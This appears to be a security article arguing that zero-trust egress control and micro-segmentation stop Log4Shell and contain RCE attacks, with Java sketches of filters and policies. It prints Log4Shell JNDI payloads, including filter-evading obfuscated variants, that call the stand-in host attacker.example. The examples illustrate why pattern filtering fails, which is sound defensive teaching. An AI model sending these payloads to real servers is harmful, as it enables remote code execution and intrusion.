How would zero trust prevent a Log4Shell attack?

There is a seemingly trivial solution to any remote code execution attack: do not let inbound traffic match the pattern that triggers the server's vulnerability. That is easy to say but hard to do, as there are almost endless variations of traffic patterns that could trigger the critical-severity Log4j vulnerability.
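To illustrate the problem, here is a minimal sketch of a naive pattern filter along with a few publicly documented payload obfuscations that slip past it; the filter logic and the host name (attacker.example) are invented for illustration:

```java
import java.util.List;
import java.util.regex.Pattern;

// Naive WAF-style filter that looks for the literal "${jndi:" token.
public class NaiveInboundFilter {
    private static final Pattern JNDI = Pattern.compile("\\$\\{jndi:");

    static boolean looksMalicious(String input) {
        return JNDI.matcher(input).find();
    }

    public static void main(String[] args) {
        List<String> payloads = List.of(
            "${jndi:ldap://attacker.example/a}",                          // caught
            "${${lower:j}ndi:ldap://attacker.example/a}",                 // evades: nested lookup
            "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/a}",  // evades: default-value trick
            "${${env:NOPE:-j}ndi:ldap://attacker.example/a}"              // evades: env-lookup fallback
        );
        payloads.forEach(p -> System.out.printf(
                "%-60s -> %s%n", p, looksMalicious(p) ? "blocked" : "PASSES"));
    }
}
```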

As a result, malicious patterns in inbound traffic are extremely hard to detect. At the same time, the outbound traffic caused by a Log4Shell attack is easy to detect: it targets arbitrary internet sites with an unusual protocol, so it is always suspicious and, according to the zero-trust model, should not be allowed.

Outbound traffic to an arbitrary internet site is a peculiarity of Log4Shell attacks that other arbitrary code execution attacks do not necessarily share. This peculiarity helps prevent exploitation not only when network defense is based on the perimeter-less zero trust network architecture (ZTNA) security model, but also when it relies on a perimeter-based castle-and-moat defense.

The consequence of a Log4Shell attack is that the exploited server tries to download code from an internet site controlled by the attacker. If the download succeeds, the server runs the code, usually to open a backdoor for the attacker. This raises some questions: how can access to an arbitrary internet site succeed in the first place? And even if it does, how can the attacker reach the opened backdoor?
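For context, here is a minimal sketch of the vulnerable pattern, assuming a pre-2.15.0 log4j-core on the classpath; the class and host names are hypothetical:

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class VulnerableHandler {
    private static final Logger log = LogManager.getLogger(VulnerableHandler.class);

    void handleRequest(String userAgent) {
        // 1. The attacker sends, e.g., User-Agent: ${jndi:ldap://attacker.example/x}
        // 2. While formatting the message, vulnerable Log4j versions expand the lookup...
        log.info("Request from {}", userAgent);
        // 3. ...causing an outbound LDAP query to attacker.example,
        // 4. whose response can point to a remote class that the JVM
        //    loads and executes, typically opening a backdoor.
    }

    public static void main(String[] args) {
        new VulnerableHandler().handleRequest("${jndi:ldap://attacker.example/x}");
    }
}
```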

Zero trust renders Log4Shell harmless

Unlike zero trust, which requires micro-segmentation, the traditional best practice is a demilitarized zone (DMZ) that isolates an organization's external-facing servers from both the local area network (LAN) and larger, usually untrusted networks such as the internet. Access from the internet to services running on DMZ servers, except public services such as web services, should be forbidden or strictly authenticated.

As there are only a few legitimate reasons why a server in a DMZ would need to access the internet, this kind of traffic should also be strictly controlled. Then, even if a Log4Shell vulnerability is exploited on the server, it cannot download and later run any malicious code, because outgoing traffic from the DMZ to the internet is prohibited. A strictly defended DMZ can prevent a Log4Shell attack: exploited servers mostly use protocols such as LDAP (via JNDI) to download the malicious code, and it is hard to imagine a legitimate reason to permit these protocols to access anything on the internet, let alone an arbitrary site, especially from a DMZ.

Zero trust specifies and generalizes the methods and approaches that have long been applied in DMZs. Zero trust requires, for instance, the least privilege principle: servers may access only the strictly necessary internet resources – e.g., an update server – with a specific address, port, and protocol. This way of working does not impose serious administrative costs on the security team, as there are only a few reasons why a server needs to access the internet, and the firewall rules created for those reasons rarely change.
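As a sketch of what such a least-privilege egress rule could look like – the rule shape, host name, and decision API are assumptions for illustration, since real enforcement belongs in a firewall or PEP rather than in application code:

```java
import java.util.Set;

// Hypothetical least-privilege egress policy for a DMZ host: only the
// update server, on one port, with one protocol, is reachable.
public class EgressPolicy {
    record Rule(String destHost, int destPort, String protocol) {}

    private static final Set<Rule> ALLOWED = Set.of(
            new Rule("updates.example.org", 443, "https")  // the only legitimate egress
    );

    static boolean permit(String host, int port, String protocol) {
        return ALLOWED.contains(new Rule(host, port, protocol));
    }

    public static void main(String[] args) {
        System.out.println(permit("updates.example.org", 443, "https")); // true
        System.out.println(permit("attacker.example", 1389, "ldap"));    // false: callback blocked
    }
}
```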

If, for whatever reason, egress cannot be tightened this far, protocol enforcement and content filtering become priorities. Least privilege also means that a resource can only be accessed with the necessary protocol. Even if an attacker runs a server on a port that is allowed from the DMZ (e.g., 443 for HTTPS), downloading the malicious code will fail when Log4j speaks a protocol (LDAP) other than the expected one (HTTPS). And even if the expected protocol is used, content filtering can still detect the malicious code.
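A minimal sketch of the protocol-enforcement idea, checking only the first bytes of a connection (a real deep-packet-inspection engine is far more thorough):

```java
// Even if port 443 egress is open, verify that the first bytes actually look
// like a TLS handshake. An LDAP message (BER-encoded, first byte 0x30) sent
// over the same port is rejected.
public class ProtocolEnforcer {
    static boolean looksLikeTls(byte[] firstBytes) {
        // TLS records start with content type 0x16 (handshake), version major 0x03.
        return firstBytes.length >= 2
                && firstBytes[0] == (byte) 0x16
                && firstBytes[1] == (byte) 0x03;
    }

    public static void main(String[] args) {
        byte[] tlsClientHello = {0x16, 0x03, 0x01, 0x02, 0x00};
        byte[] ldapBindRequest = {0x30, 0x0c, 0x02, 0x01, 0x01}; // ASN.1 SEQUENCE tag
        System.out.println(looksLikeTls(tlsClientHello));  // true  -> allow
        System.out.println(looksLikeTls(ldapBindRequest)); // false -> drop
    }
}
```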

Zero trust defends against RCE attacks

A remote code execution (RCE) attack does not necessarily require an external server from which the malicious code is downloaded. In such cases, the code is injected into a legitimate but malformed request that exploits a vulnerability. It is almost impossible to detect a pattern that exploits a zero-day vulnerability, so we should focus on the consequences of running arbitrary code on the exploited server.

If the goal is simply to bring the service down immediately after exploitation, the attacker will succeed, as there are several ways to do so even at the privilege level of the exploited service. However, privilege escalation very frequently follows an RCE, which means that a suitable patch management process is essential to minimize this threat.

It is likely that one of the attacker's next steps will be lateral movement, i.e., trying to infect other servers in the organization. This typically means turning the exploited server into a command-and-control (C&C) machine, which requires permanent access. If we follow the principles of zero trust, only the public service of a server in the DMZ can be accessed from the internet; accessing any other service on the server is either not permitted at all or is permitted only after strong authentication. If this is indeed the case, the attacker cannot reach the C&C server.
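A hypothetical micro-segmentation policy might be sketched like this; the zones, services, and rule format are invented for illustration:

```java
import java.util.List;

public class SegmentationPolicy {
    enum Zone { INTERNET, ADMIN_LAN }
    record Rule(Zone source, String service, boolean requireStrongAuth) {}

    private static final List<Rule> RULES = List.of(
            new Rule(Zone.INTERNET, "web:443", false),  // the single public service
            new Rule(Zone.ADMIN_LAN, "ssh:22", true)    // management only, strong auth required
            // No INTERNET -> ssh:22 rule exists, so an attacker's C&C channel
            // to anything but the public service is simply never reachable.
    );

    static boolean permitted(Zone source, String service, boolean strongAuth) {
        return RULES.stream().anyMatch(r ->
                r.source() == source && r.service().equals(service)
                        && (!r.requireStrongAuth() || strongAuth));
    }

    public static void main(String[] args) {
        System.out.println(permitted(Zone.INTERNET, "web:443", false)); // true
        System.out.println(permitted(Zone.INTERNET, "ssh:22", false));  // false: C&C blocked
    }
}
```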

Even if the public service itself can be used to control the server, eavesdropping and lateral movement cannot be performed if the server is isolated by micro-segmentation in line with zero-trust principles. Data leakage remains a serious threat if the attack is targeted and the exploited service can be used to exfiltrate data, but applying zero-trust principles keeps the issue contained.

Think globally, not locally: one-by-one solutions are ineffective

The Log4j developers have implemented a built-in solution to control outgoing LDAP and JNDI connections. This can help those affected by these attacks in the short term, but it does not save time in the long term, as other software has, or will have, similar issues. These kinds of security issues are a product of the way the software industry works today: rapid development cycles, release pressure, a missing security mindset, low test coverage, and a lack of security testing, among others, can all be the cause.
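For reference, the built-in mitigations look like this (names as documented for Log4j 2.15.x; verify against the version actually deployed):

```java
// JVM flag / environment variable forms (available since 2.10; default since 2.15.0):
//   java -Dlog4j2.formatMsgNoLookups=true -jar app.jar
//   export LOG4J_FORMAT_MSG_NO_LOOKUPS=true
// Log4j 2.15.0 additionally restricts JNDI (LDAP to localhost by default) via
// properties such as log4j2.allowedLdapHosts and log4j2.allowedJndiProtocols.
public class Log4jMitigationCheck {
    public static void main(String[] args) {
        // Confirm at startup that the lookup kill switch is actually set.
        String noLookups = System.getProperty("log4j2.formatMsgNoLookups",
                System.getenv().getOrDefault("LOG4J_FORMAT_MSG_NO_LOOKUPS", "false"));
        if (!Boolean.parseBoolean(noLookups)) {
            System.err.println("WARNING: Log4j message lookups may still be enabled");
        }
    }
}
```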

Security experts – penetration testers, hackers, and crackers – think differently than developers. Developers mostly focus on the happy paths, whereas security experts focus on edge and corner cases and how to exploit them, although the goals of a penetration tester and a cracker are, of course, completely different.

Though controlling outgoing connections from a server is generally a good idea, implementing it separately in every application is neither the most effective nor the fastest way. Different implementations of the same functionality may each have different issues, which increases complexity, especially if the goal is a comprehensive solution. And even if the developers of a wide variety of software projects implemented similar controls, it would require significant work.

Maintainers would then need to update a huge amount of software, which is risky and, in many cases, simply not possible, especially in large organizations and IT infrastructures. According to zero trust network architecture, there should instead be a policy enforcement point (PEP), which is responsible for enabling or terminating connections between a subject and an enterprise resource. Using a PEP, any outgoing connection from the DMZ to the internet that is not disabled outright can be carefully controlled.
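A conceptual sketch of a PEP, using the PEP/PDP separation described in NIST SP 800-207; the interface and its single rule are invented for illustration:

```java
public class PolicyEnforcementPoint {
    interface PolicyDecisionPoint {
        boolean authorize(String subject, String resource, String protocol);
    }

    private final PolicyDecisionPoint pdp;

    PolicyEnforcementPoint(PolicyDecisionPoint pdp) { this.pdp = pdp; }

    // The PEP sits inline: it relays permitted connections and terminates the rest.
    void onConnection(String subject, String resource, String protocol) {
        if (pdp.authorize(subject, resource, protocol)) {
            System.out.println("relay     " + subject + " -> " + resource);
        } else {
            System.out.println("terminate " + subject + " -> " + resource);
        }
    }

    public static void main(String[] args) {
        // Single allow rule: the DMZ web server may reach its update mirror over HTTPS.
        PolicyEnforcementPoint pep = new PolicyEnforcementPoint((s, r, p) ->
                s.equals("dmz-web-01") && r.equals("updates.example.org:443") && p.equals("https"));
        pep.onConnection("dmz-web-01", "updates.example.org:443", "https"); // relay
        pep.onConnection("dmz-web-01", "attacker.example:1389", "ldap");    // terminate
    }
}
```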

Always strictly control your resources

The solution, at least until the era of security by design arrives, is to strictly control resources, where everything is considered a resource, even something on the internet. To avoid the consequences of vulnerabilities such as Log4Shell, we must control how resources can be accessed, how they can access other resources, and how these access rules are enforced on the network, using the least privilege principle and the other principles of zero trust.
